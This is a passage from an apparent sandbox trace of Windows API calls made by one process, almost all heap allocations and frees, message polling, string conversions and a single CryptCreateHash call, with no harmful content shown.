lpMsg=0x8cf158) returned 0 [0139.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0139.745] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.745] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0139.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0139.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0139.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0139.746] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0139.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0139.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0139.746] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0139.746] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0139.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0139.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0139.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0139.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0139.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0139.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0139.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0139.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0139.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0139.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0139.747] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0139.747] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0139.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0139.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0139.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0139.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0139.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0139.748] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ea8 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0139.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0139.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0139.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0139.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0139.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0139.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0139.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0139.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0139.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0139.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d88 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0139.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0139.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0139.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0139.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0139.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0139.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0139.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0139.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0139.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0139.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0139.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0139.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0139.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0139.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0139.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0139.752] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0139.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0139.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0139.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0139.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0139.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0139.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0139.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0139.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0139.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0139.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0139.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0139.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0139.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0139.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0139.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0139.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0139.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0139.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0139.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0139.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0139.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0139.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0139.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0139.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0139.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0139.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0139.756] 